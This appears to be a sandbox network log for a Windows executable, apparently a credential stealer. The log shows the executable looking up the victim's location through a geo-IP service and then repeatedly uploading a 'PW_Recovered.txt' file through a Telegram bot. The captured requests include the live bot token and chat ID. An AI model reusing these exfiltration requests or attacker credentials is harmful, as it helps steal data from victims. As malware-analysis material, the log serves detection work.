                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMggmLzPkzsjplLMkfqn4NuIz60hN7DteDXa9xbOKitWu3Sd0QBxmiKIqXmKseh8nMuvdsoWti7u82yqekzsQFFcDPtu%2FVFZIg183UhN7nPjY3wdptMk4pygYwZOZ3FAK4HvvHR%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9906ee2729f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1932&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=15ee9105ea77e036&ts=166&x=0"
2025-01-10 22:06:33 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49815 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:34 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 22:06:34 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:34 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861583
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKhuY%2FhDosdS5EFtaOMszCJ45rgXQuMpFb8Fa7C4Hhc8NSVTXmdHEqn9WGQxho84YV9rN4OY13c%2FZmHF8x7CurF%2BzEGqEVMSEC3VCWSc0Dz8f0SLPzqx%2FOgAa1kJQfEad43W0Mlp"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9983c4c424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1597&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1828428&cwnd=248&unsent_bytes=0&cid=5fe4d129dc8f0ab9&ts=139&x=0"
2025-01-10 22:06:34 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49827 | 104.21.112.1 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
2025-01-10 22:06:35 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:35 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861584
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HJFJ26WlSAqedPrMiKQJXTd%2BUgPcVGc3RiF124nh2uW%2F5QyKlCkKo26uOnk8AcI0lD%2B6s5OhLjQcoo3NavGhKQPYkQ8UPoE5GscqFjXTh22S83jxusGxlWi522KPPKrP6KZZjtm"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9a05ebc727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1981&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1474003&cwnd=234&unsent_bytes=0&cid=509c64459400fe69&ts=151&x=0"
2025-01-10 22:06:35 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49834 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:36 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
2025-01-10 22:06:36 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:06:36 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:06:36 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49884 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:06:44 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:06:44 UTC | 585 | OUT | Data Ascii: --------------------------8dd32713826b139Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:06:44 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:06:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:06:44 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":40994,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546804,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:06 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3386f64b78bd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:07:06 UTC | 585 | OUT | Data Ascii: --------------------------8dd3386f64b78bdContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:07 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:07 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":40995,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546827,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49996 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:07 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd339547c57964
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:07:07 UTC | 585 | OUT | Data Ascii: --------------------------8dd339547c57964Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:08 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:08 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:08 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":40996,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546828,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49997 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:08 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33a4dfa3e873
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
2025-01-10 22:07:08 UTC | 585 | OUT | Data Ascii: --------------------------8dd33a4dfa3e873Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:09 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":40997,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546829,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49998 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:09 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33b470d7c755
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:09 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 62 34 37 30 64 37 63 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd33b470d7c755Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:10 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:10 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40998,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546830,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49999 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:10 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd33c3fb5a06a6
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:10 UTC | 585 | OUT | Data Ascii: --------------------------8dd33c3fb5a06a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:11 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:10 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:11 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":40999,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546830,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 50000 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:11 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd33d37f258c37
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:11 UTC | 585 | OUT | Data Ascii: --------------------------8dd33d37f258c37Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:15 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:14 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:15 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41000,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546834,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 50001 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:15 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3420b602a22e
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:15 UTC | 585 | OUT | Data Ascii: --------------------------8dd3420b602a22eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:15 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:15 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:15 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41001,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546835,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 50002 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:16 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3433ee6a7188
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:16 UTC | 585 | OUT | Data Ascii: --------------------------8dd3433ee6a7188Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:16 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:16 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41002,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546836,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 50004 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:17 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3445d7475f3b
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:17 UTC | 585 | OUT | Data Ascii: --------------------------8dd3445d7475f3bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:17 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:17 GMT
Content-Type: application/json
Content-Length: 535
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:17 UTC | 535 | IN | Data Ascii: {"ok":true,"result":{"message_id":41003,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546837,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 50005 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:18 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd345a462c9585
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:18 UTC | 585 | OUT | Data Ascii:
--------------------------8dd345a462c9585
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:18 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:18 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:07:18 UTC | 534 | IN | Data Ascii: {"ok":true,"result":{"message_id":41004,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546838,"document"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 50006 | 149.154.167.220 | 443 | 7872 | C:\Users\user\Desktop\Yef4EqsQha.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:07:19 UTC | 353 | OUT | POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3473c556f1eb
Host: api.telegram.org
Content-Length: 585
2025-01-10 22:07:19 UTC | 585 | OUT | Data Ascii:
--------------------------8dd3473c556f1eb
Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"
Content-Type: application/x-ms-dos-executable

PW | user | VIP Recovery

PC Name:216554
Date and Time: 10/01/2025 / 17:06
2025-01-10 22:07:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:07:22 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
